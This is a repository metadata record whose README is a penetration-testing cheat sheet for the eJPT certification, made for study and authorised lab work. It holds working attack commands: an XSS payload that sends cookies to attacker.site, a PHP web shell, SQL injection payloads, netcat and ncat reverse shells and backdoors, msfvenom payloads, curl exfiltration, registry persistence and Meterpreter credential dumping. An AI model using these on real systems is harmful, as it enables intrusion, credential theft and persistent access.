{"id":16446502,"url":"https://github.com/edoardottt/ejpt-notes","last_synced_at":"2026-01-27T19:04:18.906Z","repository":{"id":109574772,"uuid":"535223455","full_name":"edoardottt/eJPT-notes","owner":"edoardottt","description":"Notes I took while preparing for eJPT certification by INE Security (passed 19/20, fka eLearn Security)","archived":false,"fork":false,"pushed_at":"2025-11-01T09:16:23.000Z","size":549,"stargazers_count":153,"open_issues_count":0,"forks_count":30,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-11-01T11:19:45.327Z","etag":null,"topics":["certification","certification-prep","certifications","cybersecurity","ejpt","ejpt-notes","elearnsecurity","exam","exam-prep","ine","infosec","nmap","notes","penetration-testing","pentesting","redteamer","training"],"latest_commit_sha":null,"homepage":"https://ejpt-notes.com/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/edoardottt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":"edoardottt","liberapay":"edoardottt","patreon":"edoardottt","ko_fi":"edoardottt","open_collective":"edoardottt","custom":"https://www.paypal.me/edoardottt"}},"created_at":"2022-09-11T07:32:01.000Z","updated_at":"2025-11-01T09:16:27.000Z","dependencies_parsed_at":"2023-11-29T10:48:58.418Z","dependency_job_id":"ad79772c-6018-4c0c-8c56-d66c75a74088","html_url":"https://github.com/edoardottt/eJPT-notes","commit_stats":null,"previous_names":[],"tags_cou
nt":2,"template":false,"template_full_name":null,"purl":"pkg:github/edoardottt/eJPT-notes","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/edoardottt","download_url":"https://codeload.github.com/edoardottt/eJPT-notes/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28819062,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-27T18:44:20.126Z","status":"ssl_error","status_checked_at":"2026-01-27T18:44:09.161Z","response_time":168,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while 
reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["certification","certification-prep","certifications","cybersecurity","ejpt","ejpt-notes","elearnsecurity","exam","exam-prep","ine","infosec","nmap","notes","penetration-testing","pentesting","redteamer","training"],"created_at":"2024-10-11T09:47:50.081Z","updated_at":"2026-01-27T19:04:18.898Z","avatar_url":"https://github.com/edoardottt.png","language":null,"funding_links":["https://github.com/sponsors/edoardottt","https://liberapay.com/edoardottt","https://patreon.com/edoardottt","https://ko-fi.com/edoardottt","https://opencollective.com/edoardottt","https://www.paypal.me/edoardottt"],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n\u003cimg width=\"60%\" src=\"./ejpt.jpg\"\u003e\n\u003c/p\u003e\n\n\u003e **Note**\n\u003e These are all the notes I took while following the INE course for eJPT certification, I strongly think everything you need to pass the exam is in this 'cheatsheet'.\n\nNotes by [@edoardottt](https://edoardottt.com/), exam passed with 19/20 score.\n\nInfo about eJPT certification [here](https://security.ine.com/certifications/ejpt-certification/).  
\nRead also my [blog post](https://edoardottt.com/ejpt) about eJPT certification.\n\n#### Exam setup\n\n- Download OpenVPN configuration file\n- `sudo openvpn file.ovpn`\n- Enter username and password\n- CTRL+Z\n- `bg`\n\n#### Add a route in IP routes\n\nLinux:\n\n```bash\nip route add \u003cdestination network\u003e via \u003cgateway\u003e\n```\n\n#### Show IP addresses\n\nLinux:\n\n```bash\nip addr\n```\n\n#### Show CAM table\n\nLinux:\n\n```bash\nip neighbor\n```\n\nor\n\n```bash\nifconfig\n```\n\n#### Show Listening ports (both UDP and TCP)\n\nLinux:\n\n```bash\nnetstat -tunlp\n```\n\nWindows:\n\n```bash\nnetstat -ano\n```\n\n#### ARP Spoofing\n\n```bash\necho 1 \u003e /proc/sys/net/ipv4/ip_forward\n```\n\n```bash\narpspoof -i \u003cinterface\u003e -t \u003ctarget\u003e -r \u003chost\u003e\n```\n\nTo intercept the traffic between 192.168.4.11 and 192.168.4.16\n\n```bash\narpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16\n```\n\n#### Ping sweeping\n\n```bash\nfping -a -g 192.168.1.0/24 2\u003e /dev/null\n```\n\nor\n\n```bash\nfping -a -f targets.txt 2\u003e/dev/null\n```\n\nor\n\n```bash\nnmap -sn 192.168.1.0/24\n```\n\nor\n\n```bash\nnmap -sn -iL networks.txt\n```\n\n#### OS Fingerprinting\n\n```bash\nnmap -Pn -O \u003ctarget(s)\u003e\n```\n\n#### Port Scanning\n\n`nmap`...Then remember:\n\n- `-sT`: TCP Connect Scan, usually recorded in application logs\n- `-sS`: TCP SYN Scan, usually not recorded in app. 
logs (well configured IDSs do)\n- `-sV`: Version Detection Scan, TCP Connect Scan + Banner Detection\n\nExample:\n\n```bash\nnmap -sS -p 1-100,443 192.168.1.13,14\n```\n\nTip: Use `--reason` to show the explanation of why a port is marked open or closed  \nTip: Use `--open` to show only open, open|filtered, and unfiltered ports.\n\nTCP Quick Scan\n\n```bash\nnmap -sV -sC 192.168.1.1\n```\n\nTCP Full Scan\n\n```bash\nnmap -sV -sC -p- 192.168.1.1\n```\n\nUDP Quick Scan\n\n```bash\nnmap -sV -sU 192.168.1.1\n```\n\nGet info on a particular service\n\n```bash\nnmap -sC -p 27017 192.168.1.13 | less\n```\n\n#### Masscan\n\nCheck if masscan is properly installed:\n\n```bash\nmasscan --regress\n```\n\nScan example:\n\n```bash\nmasscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24\n```\n\nIf you want to use a VPN connection (configure the options properly):\n\n```bash\nmasscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 -e tap0 --router-ip 192.168.1.1\n```\n\nIn order to save the configuration into a file:\n\n```bash\nmasscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 --echo \u003e masscan.conf\n```\n\nUse the configuration file as input:\n\n```bash\nmasscan -c masscan.conf\n```\n\n#### Web Fingerprinting\n\nUsing netcat:\n\n```bash\nnc 192.168.1.2 80\nHEAD / HTTP/1.1\n```\n\nUsing openssl:\n\n```bash\nopenssl s_client -connect target.site:443\nHEAD / HTTP/1.1\n```\n\nUsing httprint:\n\n```bash\nhttprint -P0 -h 192.168.1.1 -s /usr/local/bin/signatures.txt\n```\n\n#### Directory/Files enumeration with dirb\n\nDefault scan:\n\n```bash\ndirb http://google.com\n```\n\nUsing a custom wordlist:\n\n```bash\ndirb http://google.com /usr/share/dirb/wordlists/small.txt\n```\n\nUsing cookies:\n\n```bash\ndirb http://google.com -c \"COOKIE:XYZ\"\n```\n\nUsing Basic Authentication:\n\n```bash\ndirb http://google.com -u \"admin:password\"\n```\n\nUsing Custom Header:\n\n```bash\ndirb http://google.com -H \"MyHeader: 
MyContent\"\n```\n\nDisable recursive enumeration:\n\n```bash\ndirb http://google.com -r\n```\n\nSet Speed delay in milliseconds:\n\n```bash\ndirb http://google.com -z 1000\n```\n\nSpecify extensions:\n\n```bash\ndirb http://google.com -X \".php,.bak\"\n```\n\nSave results in a file:\n\n```bash\ndirb http://google.com -o results.txt\n```\n\n#### Google Dorks\n\n- `site:` Include only results on a given hostname\n- `intitle:` Filters according to the title of a page\n- `inurl:` Similar to intitle but works on the URL of a resource\n- `filetype:` Filters by using the file extension of a resource\n- `AND`, `OR`, `|` Use logical operators to combine your expressions\n- `-` Filter out a keyword or a command's result\n\nExample: `-inurl:(htm|html|php|asp|jsp) intitle:\"index of\" \"last modified\" \"parent directory\" txt OR doc OR pdf`  \nSee also the [Google Hacking Database](https://www.exploit-db.com/google-hacking-database)\n\n#### XSS\n\nPayload: `\u003cscript\u003evar i = new Image(); i.src = \"http://attacker.site/log.php?q+\"+document.cookie;\u003c/script\u003e`  \nServer:\n\n```php\n\u003c?php\n$filename=\"/tmp/log.txt\";\n$fp=fopen($filename, 'a');\n$cookie=$_GET['q'];\nfwrite($fp, $cookie);\nfclose($fp);\n?\u003e\n```\n\n#### SQLi\n\nPayloads:\n\n- `' OR 'a'='a`\n- `' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a`\n- `' OR substr(user(),1,1) = 'a`\n- `' UNION SELECT user(); -- -`\n\nSqlmap:\n\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --cookie \"PHPSESSID=m42ba4etbktcktvjadirnsqqg4;`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' -p id --technique=U`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --banner`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' -v3 --fresh-queries`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --users`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --dbs`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --tables`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' -D 
\u003cdb-name\u003e -T \u003ctable-name\u003e`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db \u003cdb-name\u003e --columns`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db \u003cdb-name\u003e --dump`\n- `sqlmap -u 'http://victim.site/login.php' --data='user=a\u0026pass=a' -p user --technique=B --banner`\n- `sqlmap -r post-vuln-sqli.txt -p user --technique=B --banner`\n\nTip: Dump only the data you're interested in, not the whole database. Dumping a lot of data using SQLi is very noisy and a heavy process.\n\n#### Misconfigured PUT method\n\n```bash\nwc -m payload.php\n20 payload.php\n```\n\n```bash\nnc victim.site 80\nPUT /payload.php HTTP/1.1\nHost: victim.site\nContent-type: text/html\nContent-length: 20\n\n\u003c?php phpinfo(); ?\u003e\n```\n\n#### Uploading PHP shell\n\n```php\n\u003c?php\nif (isset($_GET['cmd']))\n{\n    $cmd = $_GET['cmd'];\n    echo '\u003cpre\u003e';\n    $result = shell_exec($cmd);\n    echo $result;\n    echo '\u003c/pre\u003e';\n}\n?\u003e\n```\n\n#### Authentication Cracking with Hydra\n\n- `hydra -U http-post-form` (get info on a module)\n- `hydra -L users.txt -P passwords.txt \u003cservice://server\u003e \u003coptions\u003e`\n- `hydra crackme.site http-post-form \"/login.php:user=^USER^\u0026pwd=^PASS^:invalid credentials\" -L users.txt -P passwords.txt -f -V`\n- `hydra 192.168.1.2 ssh -L users.txt -P passwords.txt -f -V`\n\n#### Authentication Cracking with nmap\n\n- `nmap -p 22 --script ssh-brute --script-args userdb=/root/users.txt demo.ine.local`\n\n#### Authentication Cracking with metasploit\n\n- `use auxiliary/scanner/ssh/ssh_login`\n- `set RHOSTS demo.ine.local`\n- `set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt`\n- `set STOP_ON_SUCCESS true`\n- `set verbose true`\n- `exploit`\n\n#### Password cracking using John the Ripper\n\n- `unshadow /etc/passwd /etc/shadow \u003e crackme.txt`\n- `john --incremental -users:\u003cusers-list\u003e  crackme.txt` (bruteforce, don't use 
it!)\n- `john --show crackme.txt`\n- `john --wordlist=\u003cwordlist-filename\u003e crackme.txt`\n- `john --wordlist=\u003cwordlist-filename\u003e --rules crackme.txt` (enable word mangling)\n\n#### Cracking Password of Microsoft Word file using John the Ripper\n\n- `/usr/share/john/office2john.py MS_Word_Document.docx \u003e hash`\n- `john --wordlist=passwds.txt hash`\n\n#### Password cracking using Hashcat\n\n- `hashcat -m 0 -a 0 -D2 example0.hash example.dict` (m = 0 is MD5)\n- `hashcat -m 0 -a 0 -D2 example0.hash example.dict -r custom.rule`\n\n#### Windows Shares\n\nInteresting shares:\n\n- `\\\\ComputerName\\C$` lets an administrator access a volume (C$, D$, E$...)\n- `\\\\ComputerName\\admin$` points to the Windows installation directory\n\nEnumerating shares (Windows):\n\n- `nbtstat -A 192.168.1.11`\n- `net view 192.168.1.11`\n- `net use \\\\192.168.1.11\\IPC$ '' /u:''` (null session attack)\n- `enum -S 192.168.1.11` ([enum](https://packetstormsecurity.com/search/?q=win32+enum\u0026s=files))\n- `enum -U 192.168.1.11`\n- `enum -P 192.168.1.11`\n\nEnumerating shares (Linux):\n\n- `nmblookup -A 192.168.1.11`\n- `smbclient -L //192.168.1.11 -N`\n- `smbclient //192.168.1.11/IPC$ -N` (null session attack)\n- `enum4linux -n 192.168.1.11`\n- `enum4linux -P 192.168.1.11`\n- `enum4linux -S 192.168.1.11`\n- `enum4linux -s /usr/share/enum4linux/share-list.txt 192.168.1.11`\n- `enum4linux -a 192.168.1.11`\n- `smbmap -H demo.ine.local`\n- `nmap -sU -sV -p137,138 demo.ine.local`\n- `nmap -script=smb-enum-shares -Pn 192.168.1.11`\n- `nmap -script=smb-enum-users -Pn 192.168.1.11`\n- `nmap -script=smb-brute -Pn 192.168.1.11`\n- `nmap --script smb-vuln-* -Pn 192.168.1.11`\n- `python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.1.11`\n\n#### Metasploit\n\n```bash\nmsfconsole\n```\n\n```bash\nshow -h\n```\n\n```bash\nsearch \u003ckeyword(s)\u003e\n```\n\n```bash\nuse \u003cpath-to-exploit\u003e\n```\n\n```bash\nshow options\n```\n\n```bash\nset 
\u003coption-name\u003e \u003coption-value\u003e \n```\n\n```bash\nexploit\n```\n\nTip: Use `show payloads` when an exploit is selected to show only the available payloads for that exploit  \nTip: Use `info` when an exploit is selected to get information about the exploit  \nTip: Use `back` when an exploit is selected to deselect it  \n\n#### Meterpreter\n\nInside metasploit:\n\n- `search meterpreter`\n- `set payload \u003cpayload-path\u003e`\n- `background`\n- `sessions -l` (list the sessions)\n- `sessions -i \u003csession-id\u003e` (resume a background session)\n- `sysinfo`\n- `ifconfig`\n- `route`\n- `getuid`\n- `getsystem`\n- You can use Unix-like commands like `pwd`, `ls`, `cd`...\n- `download \u003cfilename\u003e \u003clocation\u003e`\n- `upload \u003cfilename\u003e \u003clocation\u003e`\n- `shell`\n- `hashdump`\n- `run autoroute -h`\n- `run autoroute -s 192.130.110.0 -n 255.255.255.0` (pivoting towards that network)\n\nTip: `help` shows an amazing list of available commands divided by category  \nTip: If `getsystem` fails, use `use exploit/windows/local/bypassuac`  \nTip: `ps -U SYSTEM` shows only the processes with SYSTEM privileges  \nTip: Use `post/windows/gather/hashdump` to dump the passwords DB and save it for an offline cracking session  \n\n#### Pivoting with Meterpreter\n\nLet's say we have compromised a machine using metasploit and we have a meterpreter shell with session id 1. We discover that there is another machine but it's reachable only from the compromised machine.  
\nOur IP: `192.180.40.2`  \nCompromised host: `192.180.40.3`  \nUnreachable machine: `192.130.110.3`  \n\n- `meterpreter \u003e run autoroute -s 192.130.110.0 -n 255.255.255.0 1`\n- `background`\n- `msf \u003e route`\n\nIf we want to scan the `192.130.110.0/24` network we can use:\n\n```bash\nmsf \u003e use auxiliary/scanner/portscan/tcp\nmsf \u003e set PORTS 80, 8080, 445, 21, 22, ...\nmsf \u003e set RHOSTS 192.130.110.1-254\nmsf \u003e exploit\n```\n\nIf we discover that at least one port is open and we want to target a specific port on a specific host (e.g. `192.130.110.3:21`) we can use:\n\n- `sessions 1` (back to meterpreter session)\n- `portfwd add -l 1234 -p 21 -r 192.130.110.3` (forwarding remote machine port 21 to the local machine port 1234)\n- `portfwd list`\n- `background`\n\nThen if we want to scan the service we can use nmap:\n\n```bash\nmsf \u003e nmap -sS -sV -p 1234 localhost\n```\n\n#### Reverse shell with Netcat\n\nAttacker:\n\n```bash\nnc -lvp 8888 -e /bin/bash\n```\n\nTarget (the IP of the attacker):\n\n```bash\nnc -v 192.168.1.1 8888\n```\n\n#### Generate a reverse shell payload with msfvenom\n\n```bash\nmsfvenom --list payloads | grep \u003ckeyword\u003e\n```\n\n```bash\nmsfvenom -p php/reverse_php lhost=192.168.0.58 lport=443 -o reverse.php\n```\n\n```bash\nmsfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.0.58 lport=443 -f elf -o reverse443\nchmod +x reverse443\n```\n\nNote: If you have generated a meterpreter payload shell, you have to use meterpreter in order to receive back the connection  \n\n#### Blind Remote Code Execution\n\nTarget (Use the Attacker IP)\n\n```bash\ncurl http://192.168.1.130:53/`whoami`\n```\n\nor\n\n```bash\ncurl http://192.168.1.130:53/`id | base64`\n```\n\nAttacker:\n\n```bash\nnc -lvp 53\n```\n\nTip: You can also create a reverse shell with `msfvenom` and let the target download it  \n\n#### Enumerating users history with meterpreter\n\n- `background`\n- `use post/linux/gather/enum_users_history`\n- `set 
SESSION 1`\n- `exploit`\n\n#### Data exfiltration with Netcat\n\nReceiver:\n\n```bash\nnc -lvnp 8888 \u003e received.txt\n```\n\nSender (the IP of the receiver):\n\n```bash\ncat message.txt | nc -v 192.168.1.1 8888\n```\n\n#### Backdoor using ncat\n\nVictim:\n\n```bash\nncat -l -p 5555 -e cmd.exe\n```\n\nAttacker (the IP of the victim):\n\n```bash\nncat 192.168.1.66 5555\n```\n\n#### Reverse Backdoor using ncat\n\nAttacker:\n\n```bash\nncat -l -p 5555 -v\n```\n\nVictim (the IP of the attacker):\n\n```bash\nncat -e cmd.exe 192.168.1.66 5555\n```\n\nTip: For persistent reverse backdoor use the registry key `Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run`\n\n#### Reverse Backdoor using Metasploit\n\n```bash\nmsfconsole\nuse exploit/windows/local/s4u_persistence\nshow options\nsessions\nset session \u003csession-id\u003e\nset trigger logon\nset payload windows/meterpreter/reverse_tcp\nset lhost \u003clocal-ip\u003e\nset lport 1234\nexploit\nuse exploit/multi/handler\nset payload windows/meterpreter/reverse_tcp\nshow options\nset lhost \u003clocal-ip\u003e\nset lport 1234\nexploit\nsysinfo\nps\nhelp\n```\n\nTip: once we get a shell we can use `screenshot` to get a picture of what the victim is seeing on the Desktop  \nTip: once we get a shell we can use `download filename location` to save the filename in the specified location on our machine  \nTip: Same syntax as above but use `upload` to upload files  \nTip: Use `getsystem` to gain the highest privilege (i.e. 
SYSTEM) on the compromised machine and `getuid` to check if it actually worked.\n\n#### Upgrading a simple shell\n\n```bash\nbash -i\n```\n\n```bash\npython -c 'import pty; pty.spawn(\"/bin/sh\")'\n```\n\n#### Maintaining access using Metasploit (Windows)\n\nInside a meterpreter session:\n\n- `background`\n- `use exploit/windows/local/persistence_service`\n- `show options`\n- `set SESSION \u003csession-id\u003e`\n- `exploit`\n\nUse the backdoor:\n\n- `background`\n- `sessions -K`\n- `use exploit/multi/handler`\n- `set PAYLOAD windows/meterpreter/reverse_tcp`\n- `set LHOST \u003cyour-ip\u003e`\n- `set LPORT 4444`\n- `exploit`\n\nNote: The `\u003csession-id\u003e` is the one you can read when you type `background`  \nNote: We need to use the same information about the backdoor to receive a new meterpreter session on the multi-handler. We can't change Payload, IP or Ports details.\n\n#### Pivoting using a SOCKS Proxy\n\nYou have access to a compromised host and only from there you can access another machine. 
That machine exposes a web server. To access it from your computer, set up a SOCKS proxy.\n\nAdd the route to the unreachable network using autoroute or route.\n\n```bash\nmsf \u003e use auxiliary/server/socks_proxy\nmsf \u003e set VERSION 4a\nmsf \u003e set SRVPORT 9050\nmsf \u003e run -j\n```\n\n```bash\nroot@INE:~# proxychains nmap ...\n```\n\nThen you can also set up Firefox to send requests through the SOCKS proxy v4 at `127.0.0.1:9050`.\n\n#### Dump AutoLogin stored credentials\n\nInside a meterpreter session:\n\n- `migrate -N explorer.exe`\n- `background`\n- `use post/windows/gather/credentials/windows_autologin`\n- `set SESSION \u003csession-id\u003e`\n- `exploit`\n\n----------\n\nIf you find an error or want to improve this page, just [open an issue](https://github.com/edoardottt/eJPT-notes/issues).\n\n**Don't** text/mail me looking for exam solutions.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fedoardottt%2Fejpt-notes","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fedoardottt%2Fejpt-notes","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fedoardottt%2Fejpt-notes/lists"}